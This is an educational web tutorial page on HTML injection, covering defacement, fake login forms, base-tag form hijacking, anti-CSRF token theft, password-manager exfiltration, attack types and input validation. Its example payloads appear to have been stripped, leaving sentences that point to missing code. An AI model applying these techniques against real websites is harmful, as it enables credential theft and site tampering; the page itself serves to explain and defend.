HTMLs Tutorial

HTML Tutorial HTML Tags HTML Basic Tags HTML Attributes HTML Elements HTML Formatting HTML Text Format HTML body tag HTML samp tag HTML script Tag HTML section tag HTML select tag HTML source tag HTML span tag HTML strike tag HTML strong tag HTML style tag HTML sub tag HTML summary tag HTML sup Tag HTML svg tag HTML table tag HTML u tag HTML Headings HTML Paragraphs HTML wbr tag HTML Anchor HTML Image HTML Lists HTML Ordered List HTML Unordered List HTML Form HTML Form input HTML with CSS HTML Layouts HTML References HTML Frames HTML Links Fieldset Tag in HTML Basic HTML Tags Br Tag in HTML Free HTML Templates How to Create a Table in HTML HTML Calendar HTML Card HTML Cellspacing HTML Center Image HTML Checkbox Read-only HTML Cleaner HTML Code for a Tab HTML Comment HTML Compiler HTML Nested Forms HTML Overlay Text on the Image HTML Select Option Default HTML Snake Game HTML Subheader HTML Tab Character dd Tag in HTML How Many HTML Tags are There HTML Align Tag HTML Responsive HTML Tab Code HTML Table Alternate Row Color HTML Table Fix Column Width Contact HTML DL Tag in HTML How to Insert Image in HTML HTML Background Color HTML Dark Mode How to Convert HTML to PNG HTML Data Toggle HTML Email Template HTML Font Color HTML Font Family ID and Class in HTML HTML Tab Space HTML Tab Tag HTML Itemprop HTML Itemscope HTML Form Design HTML Input Only Numbers HTML Textarea HTML to JPG HTML to Markdown Python li Tag in HTML MDN HTML What is the Correct HTML for Making a Hyperlink? What is the Root Element of an HTML Document How to Make a Box in HTML How to Save HTML Files in Notepad How to Align Text in HTML How to Change Font Color in HTML? How to Change Font Size in HTML How to Change Image Size in HTML How to Create a HTML Page How to Create a Link in HTML File? How to Create an HTML File? HR Tag in HTML HTML Base Tag HTML Default Attribute HTML Hyperlink HTML Indent HTML Injection Payloads HTML Input Numbers Only HTML Roadmap HTML Row Height HTML Schedule HTML Space HTML Tab HTML vs HTTP HTML5 API HTML5 Video HTML Collection to Array Text Area in HTML

HTML5 Advance

HTML5 Tutorial HTML5 Tags HTML Button Tag HTML canvas Tag HTML caption Tag HTML City tag HTML Tag HTML5 SVG HTML Event Attribute HTML5 Audio HTML5 Youtube HTML5 Button Tag HTML5 Tags

Misc

How to add JavaScript to HTML How to change font in HTML How to change text color in HTML HTML Date HTML Hide Element HTML Nested Table HTML Reset Button What does HTML stand for? HTML Background Image HTML Tag Div Tag in HTML How to insert Image in HTML How to create a link with no underline in HTML How to insert spacestabs in text using HTMLCSS HTML tag HTML Code HTML Tag HTML Canvas Design a tribute page using HTML and CSS What is a Container tag Font tag in HTML Difference between HTML and DHTML Empty Tag in HTML HTML Button Link Html Line Break Img src HTML Nested List in HTML Placeholder in HTML TD in HTML HTML Space Code HTML Target Attribute HTML Tag Markup Meaning in HTML Border-Collapse in HTML HTML Onclick Online HTML Compiler Convert HTML to PDF HTML Formatter HTML5 - Web Storage HTTP – Responses Container Tag in HTML DL Tag in HTML Horizontal Rule HTML HTML Tab Text Html Table Cell Background Color HTML Table Cell Color HTML Col Width How Many HTML Tags are There Convert String to Unicode Characters in Python HTML Runner HTML Style Attribute HTML Superscript Attribute HTML tabindex Marquee Tag in HTML HTML Dynamic Form HTML side Tag HTML Pattern Attribute HTML q Tag HTML Readonly Base 64 Encoding in HTML Documents Enhancing Data Portability and Security Evo Cam Web Cam HTML Free code camp HTML CSS How to Add a JS File in HTML? How to Add Picture in HTML How to Add the Logo in HTML? How to Add Video in HTML HTML Class Attribute HTML Entities HTML Form Elements HTML Form Templates HTML Marquee Tag HTML Radio Buttons HTML Text box HTML to JSX HTML Tooltip Basic HTML Codes How to Align Image Center in HTML HTML Header Tag HTML Image Tag HTML Next Line

HTML Injection Payloads
2024-06-06 05:17:12

HTML Injection Payloads

Overview of HTML Injection 

The "skeleton" of any online application is "HTML," which defines the general layout and style of the hosted material. Ever questioned what might occur if a few basic scripts were to damage this anatomy? Or does this structure begin to take the blame for web application tampering? In this post, we'll learn how these improper HTML codes enable hackers to alter carefully created websites and steal confidential data from users. 

How does HTML Injection work? 

A form of attack known as HTML injection occurs when malicious HTML code is added to a website. This may result in anything from small-scale website vandalism to large-scale data breaches. HTML injection, in contrast to other online vulnerabilities, attacks the markup language that serves as the foundation for the majority of websites. 

This attack focuses on altering the structure and content of a webpage, which sets it apart from other online vulnerabilities that make use of server or database flaws. 

Typical Reasons 

One of the most frequent reasons for HTML injection is negligence. First on the list is a lack of input validation, which makes it easy for attackers to enter harmful code. Hackers with experience can also take advantage of misconfigured web servers, which provide opportunities. Finally, these assaults are made possible by careless or hurried coding techniques that are vulnerable. 

Despite their seeming technicality, these reasons are frequently the result of human mistakes. The human factor is always there, whether it's a server administrator incorrectly configuring settings or a developer ignoring a security precaution. 

Illustrations of HTML Injection 

The following are some of the most typical instances of HTML injections: 

Defacing

HTML injection's most basic use is defacing, which alters the page's visible content. To add a visual advertisement for a product they intend to sell, for instance, an attacker may utilise a cached HTML injection. Furthermore, the attacker may use malicious HTML code for personal or political gain to damage the page's reputation. 

Extrapolation of private user data 

Two more common uses of HTML injection are the construction of a form on the intended website and manipulating the user into providing confidential data there.

For example, a malicious code insert may be used by an attacker to show a fake login form. Afterward, the form's login and password data would be sent to a server the attacker-controlled. 

If the website uses relative URLs, the hacker could try to exploit the tag to steal data. For example, all forms would be submitted to the xyz.com website, which is controlled by the attacker, if they inject, because the web page uses relative URLs to submit forms. 

Theft of Anti-CSRF Tokens 

Additionally, using HTML injection, attackers can take anti-CSRF tokens and utilize them in a later cross-site request forgery (CSRF) attack.  The hidden input type on a form is frequently used to send anti-CSRF tokens. 

To exfiltrate the token, an attacker may, for instance, utilize a non-terminated tag with single quotes, like this: 

Another option is to insert a <textarea> tag. The <textarea> and <form> tags will both be implicitly closed in this case and any content that comes after the <textarea> element will be submitted.

Exfiltrating Stored Passwords in the Browser

Attackers can also incorporate forms that browser password managers will automatically fill out using HTML injections. If the attacker successfully injects the correct form, the password manager will provide the user credentials immediately. All that is needed for the form to work with multiple browsers is that the action parameter points to any host, and the input fields have the correct names and structures. 

Effects of HTML Injection 

HTML injection vulnerabilities are commonly disregarded. Even if HTML injections don't directly harm the web server or the database, they might still have detrimental effects like the following. 

An attacker may create a fake form to trick a user into entering their login credentials or to steal password information that has been stored in the browser. If the targeted user possesses certain permissions, malicious actors may be able to access the web application on an administrative level. 

If the attacker conducts a public attack, the company, organization, or even the country's reputation might be severely harmed. If a high-value page is vandalized or used as a means of spreading false information, users or clients could make unwise decisions and lose trust in your cybersecurity protocols.

The attacker may utilize HTML injection as a stepping stone to more serious attacks like CSRF. 

After inserting his HTML content into malicious URLs, the attacker emails the victim the URLs. The user accesses the website since it is housed on a trustworthy domain, which allows his identity to be stolen.

HTML Injection Types 

Since HTML is considered a reasonably simple language, this attack doesn't seem to be that hard to understand or execute. There are various methods to execute this sort of assault. However, reflected and stored HTML injection are the two primary types. 

Stored HTML Injection 

A malicious script that has been injected into a web application which is permanently saved inside the application server is called a "stored HTML" attack, which is sometimes referred to as "Persistence". When the user views the injected webpage, the application server then dumps the malicious script back out to the user. The browser will run the injected HTML code when the user clicks on the payload, which seems to be an official website element. 

The most common use case for cached HTML is the "comment option" on blogs, which allows any user to submit input in the form of comments for the admin or other users. 

Injection of HTML using DOM 

The webpage's Document Object Model (DOM), which depicts the page's structure, is the target of the assault. Attackers can insert malicious scripts that run client-side by tampering with the DOM. 

Both web developers and security experts must comprehend the DOM. It serves as a link between HTML and JavaScript, and any flaws might result in serious security lapses. The first line of defense is understanding how these assaults function. 

Reflected HTML Injection 

A web application generates "Reflected HTML Injection," or "Non-Persistence Vulnerability," when it responds to user input without first validating it. This allows a prospective attacker to embed browser executable code within the single HTML response. The reason it is called "non-persistent" is that the malicious script is not stored on the web server, therefore phishing must be used to disseminate the dangerous link and trick the user. 

An attacker might easily put arbitrary HTML code into a website's search textbox. If the website contains a HTML vulnerability then the output page will show the HTML entities in response.

Strategies for prevention and mitigation 

Validation and Sanitization of Input 

Input validation and sanitization are the first lines of defense against HTML injection. Malicious inputs can be effectively blocked by ensuring that every user input is carefully checked against a predetermined criterion. This entails ensuring that data types, lengths, and patterns match expected values by inspecting them.